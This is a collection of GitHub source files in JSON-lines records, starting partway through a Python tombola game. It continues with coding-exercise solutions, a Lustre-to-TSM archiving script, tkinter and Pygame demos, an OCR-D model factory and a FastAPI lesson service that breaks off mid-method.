convention)'''\n            for i in range(len(lista_giocatori)):\n                n=n_cartelle[i]\n                for j in range(n):\n                    '''Search for the last drawn number inside the cards assigned to the players; the result is its position indices'''\n                    
indici=lista_giocatori[i].visualizza_cartella(j).cerca_numero(estratti[-1])\n\n                    if len(indici[0]) !=0: # if those position indices exist, the number is present on that card, so use them to put a -1 there\n                        lista_giocatori[i].visualizza_cartella(j).inserisci_numero(indici[0],indici[1],-1)\n                    else:\n                        pass\n\n            '''The same is done for the board: get the position indices of the drawn number and use them to replace it with '-1'\n            NB: 3 indices are needed: the first to identify which card the drawn number is on, the remaining ones to locate the number inside that card (a matrix)\n            '''\n            indici_tab = tabellone.pos_numero_estratto_tabellone(estratti[-1])\n            tabellone.sostituisci_numero_tabellone(indici_tab[0],indici_tab[1],indici_tab[2])\n\n            '''For each player i, check the possible wins''' \n            for i in range(len(lista_giocatori)): \n                n=n_cartelle[i]\n                for j in range(n):\n                    exitcond=regole.verifica_vincite(lista_giocatori[i].visualizza_cartella(j))[1]\n                    if(exitcond == True): # if a player scored tombola, the game ends\n                        print('FINE PARTITA: Il giocatore',i+1,'ha fatto Tombola nella cartella', j+1)\n                        for i in range(len(lista_giocatori)):\n                            n=n_cartelle[i]\n                            print('Giocatore ', i+1)\n                            for j in range(n):\n                                lista_giocatori[i].visualizza_cartella(j).stampa()\n                        exit()\n\n                    vincita=regole.verifica_vincite(lista_giocatori[i].visualizza_cartella(j))[0]\n                    if vincita not in vincite: # check that this win has not already been claimed\n                        vincite.append(vincita)# if the player is the first to claim a given win, record it and print the win type\n                        if vincita == 2:\n                            print('Il Giocatore',i+1,'ha fatto ambo, nella cartella', j+1 )\n                        elif vincita == 3:\n                            print('Il Giocatore',i+1,'ha fatto terna, nella cartella', j+1 )\n                        elif vincita == 4:\n                            print('Il Giocatore',i+1,'ha fatto quaterna, nella cartella', j+1 )\n                        elif vincita == 5:\n                            print('Il Giocatore',i+1,'ha fatto cinquina, nella cartella', j+1 )\n                    \n                    '''When a new win occurs, the user gets the chance to view the players' cards or the numbers drawn on the board'''\n                    try:\n                        while True:\n                            print('Digita: \\n -1 per visualizzare le cartelle dei giocatori \\n -2 per visuializzare il cartellone \\n -premere invio per continuare a giocare\\n ')\n                            handle_richiesta= int(input('>'))\n                            if handle_richiesta==1:\n                                for i in range(len(lista_giocatori)):\n                                    n=n_cartelle[i]\n                                    print('Giocatore ', i+1)\n                                    for j in range(n):\n                                        lista_giocatori[i].visualizza_cartella(j).stampa()\n\n                            elif handle_richiesta==2:\n                                tabellone.visualizza_tabellone()\n                            else:\n                                break # any value other than 1 and 2 exits the while loop\n                    except:\n                        pass\n            \n        else:\n            pass\n\n        '''Until a player scores tombola, the program keeps asking to perform new draws''' \n        input(\"Procedo con una nuova estrazione?\")\n    else:\n        exit()\nexcept:\n    print(' ')\n\n\n    \n\n","repo_name":"lucabracaglia/TOMBOLA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7291,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"32420744021","text":"from typing import List\n\nclass Solution:\n    def singleNumber(self, nums: List[int]) -> List[int]:\n        \"\"\"Binary xor `^` operator, if x ^ y = z, then x ^ z = y.\n        \"\"\"\n        # suppose the singletons are a and b, x = a ^ b\n        x = 0\n        for y in nums:\n            x ^= y\n        # x 
& (-x) gives x's rightmost 1-bit position, \n # so this is the position a has 1 and b has 0 or vice versa\n z = x & (-x)\n # thus, z & a = 1 and z & b = 0 or vice versa\n a = 0\n for y in nums:\n if z & y:\n a ^= y\n return [a, x ^ a]\n\nif __name__ == '__main__':\n solver = Solution()\n # test cases\n cases = [\n [0,1],\n [2,2,3,5],\n [0,1,0,1,2,3]\n ]\n rslts = [solver.singleNumber(s) for s in cases]\n for cs, rs in zip(cases, rslts):\n print(f\"case: {cs} | solution: {rs}\") ","repo_name":"gyang274/leetcode","sub_path":"src/0200-0299/0260.single.num.py","file_name":"0260.single.num.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"28641151533","text":"#!/usr/bin/python\nimport argparse\nimport logging\nimport xattr\nimport uuid\nimport tsm.client\nimport sys\nimport time\nimport os.path\nimport configparser\nimport pymysql\n\n\"\"\"\nUse the Python TSM library from bbrauns/tsm-api-client\nhttps://github.com/bbrauns/tsm-api-client\n\nEach file is assigned a UUID and this reference is used to put the object\nin the TSM backend.\n\"\"\"\n\nlogging.basicConfig(level=logging.DEBUG,\n filename='/var/log/ct_tsm.log')\n\n# Overwrite the default log level for TSM client. It is very verbose and\n# causes problems with systemd as this is all STDOUT\ntsmlogger = logging.getLogger('tsm.client')\ntsmlogger.propagate = False\ntsmlogger.setLevel(logging.DEBUG)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--fd', type=int)\nparser.add_argument('--fid', required=True)\nparser.add_argument(\"--lustre-root\", required=True)\nparser.add_argument(\"--filespace\", default='project', type=str,\n help=\"TSM filespace where the archived file is stored, \\\nshould be similair to the Lustre filesystem name\")\nparser.add_argument(\"--config\", default='/etc/lhsm_cmd.conf', type=str,\n help=\"Config file, required to get the information in \\\nthe database of robinhood to remove with uuid\")\n\ngroup_action = parser.add_mutually_exclusive_group(required=True)\ngroup_action.add_argument('--archive', action='store_true',\n help=\"Send this file to TSM\")\ngroup_action.add_argument('--restore', action='store_true',\n help=\"Retrieve the content from TSM\")\ngroup_action.add_argument('--remove', action='store_true',\n help=\"Delete this file from TSM\")\n\nparser.add_argument('--verbose', '-v', action='count')\n\nargs = parser.parse_args()\n\ntsm_client = tsm.client.TSMApiClient()\n\n\ndef fid2lupath(lustre_root, fid):\n return \"{lustre_root}/.lustre/fid/{fid}\".format(\n lustre_root=args.lustre_root,\n fid=args.fid.strip('[]'),\n )\n\n\ndef logstatus(action, status, time, fid, size=0):\n logging.info(\n 'type=stats fid={0} action={1} status={2} runtime={3} size={4}'.format(\n fid, action, status, time, size))\n\n\nstart = time.time()\nif args.archive:\n action = 'ARCHIVE'\n if args.fd is None:\n logging.error('Need a FD handle to archive a file')\n sys.exit(1)\n if os.path.isfile(\"/proc/self/fd/{0}\".format(args.fd)) is False:\n logging.error('FD does not exist')\n sys.exit(1)\n\n fid_path = fid2lupath(args.lustre_root, args.fid)\n logging.info('Archiving fid %s, with fid_path %s', args.fid, fid_path)\n\n if 'trusted.lhsm.uuid' in xattr.listxattr(fid_path):\n # Get the previous UUID\n file_uuid = xattr.getxattr(fid_path, 'trusted.lhsm.uuid')\n else:\n # Create a new UUID for a new file\n new_uuid = str(uuid.uuid1()).encode()\n logging.debug('Assigning uuid %s', new_uuid)\n xattr.setxattr(fid_path, 
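# Standalone demo of the two tricks used in singleNumber() above:
# x & (-x) isolates the lowest set bit, and xor-partitioning by that bit
# separates the two unique values (hypothetical helper name, toy input).
def lowest_set_bit(x):
    return x & (-x)

assert lowest_set_bit(0b1011000) == 0b1000
nums = [1, 2, 1, 3, 2, 5]       # 3 and 5 appear exactly once
x = 0
for y in nums:
    x ^= y                      # x == 3 ^ 5
z = lowest_set_bit(x)           # a bit where 3 and 5 differ
a = 0
for y in nums:
    if y & z:
        a ^= y                  # xor over the group that has bit z set
assert sorted([a, x ^ a]) == [3, 5]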
'trusted.lhsm.uuid', new_uuid)\n        file_uuid = new_uuid\n    try:\n        logging.debug('Starting Archival call: tsm_client.archive')\n        tsm_client.archive(filename=\"/proc/self/fd/{fd}\".format(fd=args.fd),\n                           filespace=args.filespace,\n                           highlevel='by-uuid',\n                           lowlevel=file_uuid.decode())\n        logging.info('Archive complete for {}'.format(args.fid))\n        status = 'SUCCESS'\n    except Exception as e:\n        status = 'FAILURE'\n        logging.error(e)\n    finally:\n        tsm_client.close()\n\nif args.restore:\n    action = 'RESTORE'\n    if args.fd is None:\n        logging.error('Need a FD handle to restore a file')\n        sys.exit(1)\n    fid_path = fid2lupath(args.lustre_root, args.fid)\n    logging.info('Started restore of fid %s, with fid_path %s',\n                 args.fid, fid_path)\n    file_uuid = xattr.getxattr(fid_path, 'trusted.lhsm.uuid')\n    logging.debug('UUID: %s', file_uuid.decode())\n\n    try:\n        tsm_client.connect()\n        tsm_client.retrieve(dest_file=\"/proc/self/fd/{fd}\".format(fd=args.fd),\n                            filespace=args.filespace,\n                            highlevel='by-uuid',\n                            lowlevel=file_uuid.decode())\n        logging.info('Retrieval of fid {} from TSM completed'.format(args.fid))\n        status = 'SUCCESS'\n    except Exception as e:\n        status = 'FAILURE'\n        logging.error(e)\n    finally:\n        tsm_client.close()\n\nif args.remove:\n    action = 'REMOVE'\n    logging.info('Started removal of fid {} from TSM'.format(args.fid))\n    fid_path = fid2lupath(args.lustre_root, args.fid)\n    try:\n        file_uuid = xattr.getxattr(fid_path, 'trusted.lhsm.uuid')\n    except IOError:\n        # File does not exist, we need to check in robinhood to get the UUID\n        # in the SOFT_RM table\n        config = configparser.ConfigParser()\n        config.read(args.config)\n        db = pymysql.connect(\n            host=config.get('database', 'host'),\n            port=int(config.get('database', 'port')),\n            user=config.get('database', 'user'),\n            password=config.get('database', 'password'),\n            db=config.get('database', 'db'))\n        cursor = db.cursor()\n        query = \"SELECT lhsm_uuid FROM SOFT_RM_DELAYED \\\nWHERE id=\\\"{fid}\\\"\".format(\n            fid=args.fid.strip(\"[]\"))\n        cursor.execute(query)\n        file_uuid = cursor.fetchone()[0]\n\n    logging.debug('UUID: %s', file_uuid.decode())\n    try:\n        tsm_client.connect()\n        tsm_client.delete(filespace=args.filespace,\n                          highlevel='by-uuid',\n                          lowlevel=file_uuid.decode())\n        logging.info('Deletion of fid {} from TSM completed'.format(args.fid))\n        status = 'SUCCESS'\n    except Exception as e:\n        logging.error(e)\n        status = 'FAILURE'\n    finally:\n        tsm_client.close()\n\nruntime = round(time.time() - start)\nlogstatus(action, status, runtime, args.fid)\nif status != 'SUCCESS':\n    sys.exit(1)\n","repo_name":"guilbaults/ct_tsm","sub_path":"ct_tsm.py","file_name":"ct_tsm.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
{"seq_id":"35109694923","text":"from tkinter import *\n\nroot = Tk()\n\nentry_1= Entry(root,width=45, bg='white', fg='black')\nentry_1.pack()\nentry_1.insert(0,'enter the name')\n\ndef Myclick():\n    name= 'Hello '+entry_1.get()\n    Label1= Label(root, text=name,font='Arial',fg='Blue')\n    Label1.pack()\n\nMybutton= Button(root, text='Enter your name!!',padx=75, pady=5,bg='yellow',fg='red',command=Myclick) # state=DISABLED means disabling the button\nMybutton.pack()\n\n\nroot.mainloop()","repo_name":"subin1990/Python","sub_path":"Python_Basics/Tkinter_tutorial/4_Entry.py","file_name":"4_Entry.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"26512705180","text":"\n# STRING 
FORMATTING:\n# refers to building character strings\n# a newer and more efficient way to concatenate str\n# syntax: '{:*^30}'.format('centered')  # use * as a fill char\n# after the ':' you can specify what changes you want applied to the variable\n\nfrom datetime import datetime\n\n\ntoy = \"car\"\n# %s -> a string goes here\nnew_string = \"This is a %s\" % toy\n\nfirst_name = \"Mihai\"\nlast_name = \"Dinu\"\nage = 20\n\n\nprint(\"Prenume: %s | Nume: %s | Varsta: %d\" % (first_name, last_name, age))\n\n\ndef get_titles(lang):\n\n    if lang == \"ro\":\n        return {\n            \"title\": \"factura\",\n            \"client_name\": \"nume client\",\n            \"client_address\": \"adresa\",\n            \"iban\": \"IBAN\",\n        }\n\n    if lang == \"en\":\n        return {\n            \"title\": \"invoice\",\n            \"client_name\": \"client name\",\n            \"client_address\": \"address\",\n            \"iban\": \"account number\",\n        }\n\n\nclass Client:\n    def __init__(self, name, address, iban) -> None:\n        self.name = name\n        self.address = address\n        self.iban = iban\n\n\nclass Invoice:\n    def __init__(self, client) -> None:\n        self.client = client\n\n    def print_invoice(self, lang):\n        inv_len = 70\n        strings = get_titles(lang)\n\n        print(f\"{strings['title'].title():*^{inv_len}}\")\n        print(\n            f\"{strings['client_name'].title()}:\"\n            f\"{self.client.name:>{inv_len - 1 - len(strings['client_name'])}}\"\n        )\n        print(\n            f\"{strings['client_address'].title()}:\"\n            f\"{self.client.address:>{inv_len - 1 - len(strings['client_address'])}}\"\n        )\n        print(\n            f\"{strings['iban'].title()}:\"\n            f\"{self.client.iban:>{inv_len - 1 - len(strings['iban'])}.20}\"\n        )\n        print(f\"{datetime.now().strftime('%d-%m-%Y'):=^{inv_len}}\")\n        print()","repo_name":"simona0904/IT-School_2022","sub_path":"S17.string.operations/format1.py","file_name":"format1.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"72766666633","text":"# adjacency list\ngraph = {\n    'A': ['D', 'C', 'B'],\n    'B': ['E'],\n    'C': ['G', 'F'],\n    'D': ['H'],\n    'E': ['I'],\n    'F': ['J']\n}\n\n\ndef dfs(graph, node):\n    \"\"\"\n    This method will accept a graph, and traverse through it using DFS.\n    We will use a stack and a list to keep track of the visited nodes.\n    We will begin at the root node, append it to the path and mark it as visited.\n    Then we will add all of its neighbors to the stack.\n    At each step, we will pop out an element from the stack and check if it has been visited.\n    If it has not been visited, we will add it to the path and add all of its neighbors to the stack. 
\n \"\"\"\n if node is None or node not in graph:\n return \"Invalid input\"\n\n path = []\n stack = [node]\n\n while len(stack) != 0:\n s = stack.pop()\n if s not in path:\n path.append(s)\n\n if s not in graph:\n # leaf node\n continue\n\n for neighbor in graph[s]:\n stack.append(neighbor)\n\n return \" \".join(path)\n\n\n# calling dfs method on node \"A\"\ndfsPath = dfs(graph, 'A')\n\nprint(dfsPath)\n\n# recursive dfs below\n\n\ndef recursiveDfs(graph, node, path=[]):\n \"\"\"\n This is the way to do dfs in a recursive manner.\n Base case will be \"if the leaf node has been visited, we need to backtrack\"\n \"\"\"\n if node not in path:\n path.append(node)\n\n if node not in graph:\n # back track, leaf node\n return path\n\n for neighbor in graph[node]:\n path = recursiveDfs(graph, neighbor, path)\n\n return path\n\n\ngraph2 = {\n 'A': ['B', 'C', 'D'],\n 'B': ['E'],\n 'C': ['F', 'G'],\n 'D': ['H'],\n 'E': ['I'],\n 'F': ['J']\n}\n\npath = recursiveDfs(graph2, 'A')\n\nprint(\" \".join(path))\n","repo_name":"calcantara35/AlgorithmsAndDataStructures","sub_path":"dfsNonRecursive.py","file_name":"dfsNonRecursive.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9373571840","text":"class Node: \n def __init__(self, data, depth):\n self.data = data\n self.left = None\n self.right = None\n self.depth = depth\n#\n# Complete the swapNodes function below.\n#\n\ndef inOrder(root):\n #Write your code here\n if root == None: \n return\n inOrder(root.left)\n print(root.data, end=' ')\n inOrder(root.right)\n\ndef swap(root, h):\n if root == None:\n return\n if root.depth>=h and root.depth%h == 0:\n temp = root.left\n root.left = root.right\n root.right = temp\n swap(root.left, h)\n swap(root.right, h)\n \nfrom collections import deque\ndef swapNodes(indexes, queries):\n root = Node(1, 1)\n curr = root\n nodes = deque()\n nodes.append(curr)\n n = 0\n while(n < len(indexes)):\n curr = nodes[0]\n nodes.popleft()\n leftnode = indexes[n][0]\n rightnode = indexes[n][1]\n curr.left = None if leftnode == -1 else Node(leftnode, curr.depth+1)\n curr.right = None if rightnode == -1 else Node(rightnode, curr.depth+1)\n if curr.left !=None and curr.left.data != -1: \n nodes.append(curr.left)\n if curr.right != None and curr.right.data != -1: \n nodes.append(curr.right)\n n=n+1\n \n for height in queries:\n swap(root, height)\n inOrder(root)\n print()\n \nif __name__ == '__main__':\n\n n = int(input())\n\n indexes = []\n\n for _ in range(n):\n indexes.append(list(map(int, input().rstrip().split())))\n\n queries_count = int(input())\n\n queries = []\n\n for _ in range(queries_count):\n queries_item = int(input())\n queries.append(queries_item)\n\n swapNodes(indexes, queries)\n","repo_name":"princesharma74/60DaysChallenge","sub_path":"DAY43.py","file_name":"DAY43.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37822960732","text":"import re\nimport nltk\nnltk.download('punkt')\n\nwith open('stopwords-ms.txt', 'r') as f:\n stop_words = [line.strip() for line in f]\n\ndef preprocess_text(text):\n # Remove URLs\n text = re.sub(r'http\\S+', '', text)\n # Remove hashtags\n text = re.sub(r'#[A-Za-z0-9]+', '', text)\n # Remove mentions\n text = re.sub(r'@[A-Za-z0-9]+', '', text)\n # Remove emojis\n text = re.sub(r'[^\\w\\s]', '', text)\n # Tokenize text\n tokens = nltk.word_tokenize(text.lower())\n # Remove 
stopwords\n tokens = [token for token in tokens if token not in stop_words]\n # Join tokens back into string\n text = ' '.join(tokens)\n return text\n","repo_name":"ssakinah/pantau","sub_path":"fastapi/text_preprocessor.py","file_name":"text_preprocessor.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24384888377","text":"\"\"\"\n\nFactory methods to create models for data, files, URLs.\n\n\"\"\"\nfrom datetime import datetime\nfrom pathlib import Path\nfrom yaml import safe_load, safe_dump\n\nfrom PIL import Image\nfrom lxml import etree as ET\n\nfrom ocrd_utils import VERSION, MIMETYPE_PAGE, guess_media_type\nfrom ocrd_models import OcrdExif, OcrdFile, ClientSideOcrdFile\nfrom ocrd_models.ocrd_page import (\n PcGtsType, PageType, MetadataType,\n parse, parseEtree\n)\n\n__all__ = [\n 'exif_from_filename',\n 'page_from_file',\n 'page_from_image',\n]\n\n\ndef exif_from_filename(image_filename):\n \"\"\"\n Create :py:class:`~ocrd_models.ocrd_exif.OcrdExif`\n by opening an image file with PIL and reading its metadata.\n\n Arguments:\n image_filename (str): Local image path name (relative to workspace).\n \"\"\"\n if image_filename is None:\n raise Exception(\"Must pass 'image_filename' to 'exif_from_filename'\")\n with Image.open(image_filename) as pil_img:\n ocrd_exif = OcrdExif(pil_img)\n return ocrd_exif\n\ndef page_from_image(input_file, with_tree=False):\n \"\"\"\n Create :py:class:`~ocrd_models.ocrd_page.OcrdPage`\n from an :py:class:`~ocrd_models.ocrd_file.OcrdFile`\n representing an image (i.e. should have ``@mimetype`` starting with ``image/``).\n\n Arguments:\n input_file (:py:class:`~ocrd_models.ocrd_file.OcrdFile`): file to open \\\n and produce a PAGE DOM for\n Keyword arguments:\n with_tree (boolean): whether to return XML node tree, element-node mapping \\\n and reverse mapping, too (cf. :py:func:`ocrd_models.ocrd_page.parseEtree`)\n \"\"\"\n if not input_file.local_filename:\n raise ValueError(\"input_file must have 'local_filename' property\")\n if not Path(input_file.local_filename).exists():\n raise FileNotFoundError(\"File not found: '%s' (%s)\" % (input_file.local_filename, input_file))\n exif = exif_from_filename(input_file.local_filename)\n now = datetime.now()\n pcgts = PcGtsType(\n Metadata=MetadataType(\n Creator=\"OCR-D/core %s\" % VERSION,\n Created=now,\n LastChange=now\n ),\n Page=PageType(\n imageWidth=exif.width,\n imageHeight=exif.height,\n # XXX brittle\n imageFilename=str(input_file.local_filename) if input_file.local_filename else input_file.url\n ),\n pcGtsId=input_file.ID\n )\n if not with_tree:\n return pcgts\n mapping = dict()\n etree = pcgts.to_etree(mapping_=mapping)\n revmap = dict(((node, element) for element, node in mapping.items()))\n return pcgts, etree, mapping, revmap\n\ndef page_from_file(input_file, with_tree=False):\n \"\"\"\n Create :py:class:`~ocrd_models.ocrd_page.OcrdPage`\n from an :py:class:`~ocrd_models.ocrd_file.OcrdFile` or a file path\n representing either a PAGE-XML or an image (to generate a PAGE-XML for).\n\n Arguments:\n input_file (:py:class:`~ocrd_models.ocrd_file.OcrdFile` or `str`): file to open \\\n and produce a PAGE DOM for\n Keyword arguments:\n with_tree (boolean): whether to return XML node tree, element-node mapping \\\n and reverse mapping, too (cf. 
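# Dependency-free sketch of the cleaning pipeline in text_preprocessor.py
# above (same regex steps, but no nltk and no stopword file; `clean` is a
# hypothetical helper, toy input).
import re

def clean(text):
    text = re.sub(r'http\S+', '', text)         # URLs
    text = re.sub(r'#[A-Za-z0-9]+', '', text)   # hashtags
    text = re.sub(r'@[A-Za-z0-9]+', '', text)   # mentions
    text = re.sub(r'[^\w\s]', '', text)         # punctuation / emojis
    return ' '.join(text.lower().split())

assert clean("Baca http://t.co/x #Berita @akaun sekarang!") == "baca sekarang"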
:py:func:`ocrd_models.ocrd_page.parseEtree`)\n \"\"\"\n if not isinstance(input_file, (OcrdFile, ClientSideOcrdFile)):\n mimetype = guess_media_type(input_file, application_xml=MIMETYPE_PAGE)\n input_file = OcrdFile(ET.Element(\"dummy\"),\n local_filename=input_file,\n mimetype=mimetype)\n if not input_file.local_filename:\n raise ValueError(\"input_file must have 'local_filename' property\")\n if not Path(input_file.local_filename).exists():\n raise FileNotFoundError(\"File not found: '%s' (%s)\" % (input_file.local_filename, input_file))\n if input_file.mimetype.startswith('image'):\n return page_from_image(input_file, with_tree=with_tree)\n if input_file.mimetype == MIMETYPE_PAGE:\n return (parseEtree if with_tree else parse)(input_file.local_filename, silence=True)\n raise ValueError(\"Unsupported mimetype '%s'\" % input_file.mimetype)\n","repo_name":"OCR-D/core","sub_path":"ocrd_modelfactory/ocrd_modelfactory/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4120,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"27"} +{"seq_id":"28105698969","text":"t = int(input())\nfor _ in range(t):\n n = int(input())\n arr = [0]\n ind = [0]*n\n comm = []\n for i in range(n-1):\n if arr[i] not in comm:\n arr.append(0)\n comm.append(arr[i])\n ind[arr[i]] = i\n else:\n arr.append(abs(ind[arr[i]] - i))\n ind[arr[i]] = i\n print(arr.count(arr[n-1]))\n","repo_name":"22Rahul22/Codechef","sub_path":"Hard Sequence.py","file_name":"Hard Sequence.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"74004587591","text":"import pygame\nimport random\nimport sys\nfrom pygame.locals import *\n\n\nFPS = 32\nSCREEENWIDTH = 400\nSCREEENHEIGHT = 512\nscreen = pygame.display.set_mode((SCREEENWIDTH,SCREEENHEIGHT))\nGROUNDY = SCREEENHEIGHT * 0.8\nGAME_SPRITES = {}\nGAME_SOUNDS = {}\nBG = 'bg.jpeg'\npipe = 'pipe1.jpeg'\n\n#Image Processing\nPLAYER = pygame.image.load('bird.png')\nPLAYER = pygame.transform.scale(PLAYER,(70,70))\nBASE = pygame.image.load('base.png')\nBASE = pygame.transform.scale(BASE,(500,250))\n#Score Image Processing\nZERO = pygame.image.load('0.png')\nZERO = pygame.transform.scale(ZERO,(40,60))\nONE = pygame.image.load('1.png')\nONE = pygame.transform.scale(ONE,(40,60))\nTWO = pygame.image.load('2.png')\nTWO = pygame.transform.scale(TWO,(40,60))\nTHREE = pygame.image.load('3.png')\nTHREE = pygame.transform.scale(THREE,(40,60))\nFOUR = pygame.image.load('4.png')\nFOUR = pygame.transform.scale(FOUR,(40,60))\nFIVE = pygame.image.load('5.png')\nFIVE = pygame.transform.scale(FIVE,(40,60))\nSIX = pygame.image.load('6.png')\nSIX = pygame.transform.scale(SIX,(40,60))\nSEVEN = pygame.image.load('7.png')\nSEVEN = pygame.transform.scale(SEVEN,(40,60))\nEIGHT = pygame.image.load('8.png')\nEIGHT = pygame.transform.scale(EIGHT,(40,60))\nNINE = pygame.image.load('9.png')\nNINE = pygame.transform.scale(NINE,(40,60))\n\ndef message(size, mess, x_pos, y_pos, color):\n font = pygame.font.SysFont(None, size)\n render = font.render(mess , True, color)\n screen.blit(render, (x_pos, y_pos))\n\n\ndef WelcomeScreen():\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):\n pygame.quit()\n sys.exit()\n\n elif event.type == KEYDOWN and (event.key == K_SPACE or event.key == K_UP):\n return\n\n else:\n message(50,\"Welcome to Flappy Bird\",10,30,(0,0,0))\n 
screen.blit(GAME_SPRITES['background'],(0,0))\n screen.blit(GAME_SPRITES['player'],(150,200))\n screen.blit(GAME_SPRITES['base'],(-30,365))\n pygame.display.update()\n\nif __name__ == '__main__':\n pygame.init()\n FPSCLOCK = pygame.time.Clock()\n pygame.display.set_caption('Flappy Bird')\n #Sprites\n GAME_SPRITES['pipe'] = (\n pygame.transform.rotate( pygame.image.load(pipe).convert_alpha(),180),\n pygame.image.load(pipe).convert_alpha() )\n\n GAME_SPRITES['background'] = pygame.image.load(BG).convert()\n GAME_SPRITES['player'] = PLAYER.convert_alpha()\n GAME_SPRITES['base'] = BASE.convert_alpha()\n\n #Sounds\n # GAME_SOUNDS[''] = pygame.mixer.Sound()\n\n while True:\n WelcomeScreen()\n maingame()\n\n","repo_name":"ItzMeAman14/Project_Flappy_Bird","sub_path":"Main/main_2.py","file_name":"main_2.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17944353084","text":"'''\n\nLet's play with the different ways to use variable arguments in\nPython. Define the functions below to make everything pass.\n\n>>> point = (3, 8, 2)\n>>> coordinates = {'x': 8, 'y': 33, 'z': -4}\n\n>>> set_destination(*point)\nGoing to x=3, y=8, z=2\n\n>>> set_destination(**coordinates)\nGoing to x=8, y=33, z=-4\n\n\n>>> values = {\"a\":3, \"b\":2, \"c\":4}\n>>> some_values = {\"c\": 7, \"b\": 4}\n\n>>> product(2, 7, 3)\n42\n>>> product(**values)\n24\n>>> product(1, **some_values)\n28\n\n>>> amounts = {\"u\": 3, \"v\": 2, \"w\": 4}\n>>> some_amounts = {\"v\": 7, \"w\": 4}\n>>> total(1, 2, 3)\n6\n>>> total(**amounts)\n9\n>>> total(3, **some_amounts)\n14\n\n>>> max_even(2, 3)\n2\n>>> max_even(2, 4)\n4\n>>> max_even(2, 3, 9, 11, 7, 8, 13, 21)\n8\n\n\n>>> country_populations = {\n... \"Russia\": 144,\n... \"USA\": 319,\n... \"Philippines\": 99,\n... \"India\": 1252,\n... 
}\n\n>>> val_for_longest_key(a=1)\n1\n>>> val_for_longest_key(a=2, aa=3)\n3\n>>> val_for_longest_key(foo=10, alpha=3, x=9)\n3\n>>> val_for_longest_key(**country_populations)\n99\n\n>>> key_for_biggest_value(a=1)\n'a'\n>>> key_for_biggest_value(a=2, aa=3)\n'aa'\n>>> key_for_biggest_value(foo=10, alpha=3, x=9)\n'foo'\n>>> key_for_biggest_value(**country_populations)\n'India'\n\n'''\n\n# Write your code here:\n\n\n#set_destination\ndef set_destination(*args, **kwargs):\n if kwargs:\n print( \"Going to x={}, y={}, z={}\".format(kwargs[\"x\"], kwargs[\"y\"], kwargs[\"z\"]))\n return\n if args:\n print(\"Going to x={}, y={}, z={}\".format(args[0], args[1], args[2]))\n return\n#total\ndef total(x=0,y=0,z=0,**kwargs):\n keys = kwargs.keys()\n result = x + y + z\n for key in keys:\n result += kwargs[key]\n return result\n\n#product\ndef product(x=1,y=1,z=1,**kwargs):\n keys = kwargs.keys()\n result = x * y * z\n for key in keys:\n result *= kwargs[key]\n return result\n\n#max_even\ndef max_even(*args):\n maxeven = 0\n for arg in args:\n if arg % 2 == 0:\n if arg >maxeven:\n maxeven = arg\n return maxeven\n\n#val_for_longest_key\ndef val_for_longest_key(**kwargs):\n keys = kwargs.keys()\n longestKey = \"\"\n for key in keys:\n if len(key) > len(longestKey):\n longestKey = key\n return kwargs[longestKey]\n\n#key_for_biggest_value\ndef key_for_biggest_value(**kwargs):\n keys = kwargs.keys()\n biggestValue = 0\n biggestValueKey = \"\"\n for key in keys:\n if kwargs[key] > biggestValue:\n biggestValue = kwargs[key]\n biggestValueKey = key\n return biggestValueKey\n\n# Do not edit any code below this line!\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n\n# Copyright 2015-2016 Aaron Maxwell. All rights reserved.\n","repo_name":"AnchalChandraGupta/labAssignmentSolution","sub_path":"labs/py2/functions/varargs.py","file_name":"varargs.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26123284556","text":"from operator import and_\nfrom models.lesson import Lesson as LessonModel\nfrom schemas.lesson import Lesson\n\nclass LessonService():\n def __init__(self,db)-> None:\n self.db = db\n\n def get_lesson(self):\n result = self.db.query(LessonModel).all()\n return result\n \n def get_lesson_by_id(self,id:int):\n result = self.db.query(LessonModel).filter(LessonModel.id == id ).first()\n return result\n \n def get_lesson_by_name(self,name:str):\n result = self.db.query(LessonModel).filter(LessonModel.name == name).first()\n return result\n \n def create_lesson(self,lesson:Lesson):\n new_lesson = LessonModel(\n id= lesson.id,\n name = lesson.name,\n description = lesson.description,\n video = lesson.video,\n resources =lesson.resources\n )\n self.db.add(new_lesson)\n self.db.commit()\n return\n \n def update_lesson(self,id:int, data:Lesson):\n lesson = self.db.query(LessonModel).filter(LessonModel.id == id).first()\n lesson.name = data.name\n lesson.description = data.description\n lesson.video = data.video\n lesson.resources =data.resources\n self.db.commit()\n return\n\n def update_lesson_by_name(self,name:str, data:Lesson):\n lesson = self.db.query(LessonModel).filter(LessonModel.name == name).first()\n lesson.name = data.name\n lesson.description = data.description\n lesson.video = data.video\n lesson.resources =data.resources\n self.db.commit()\n return\n\n def update_status_lesson(self, id:int):\n lesson = self.db.query(LessonModel).filter(LessonModel.id == 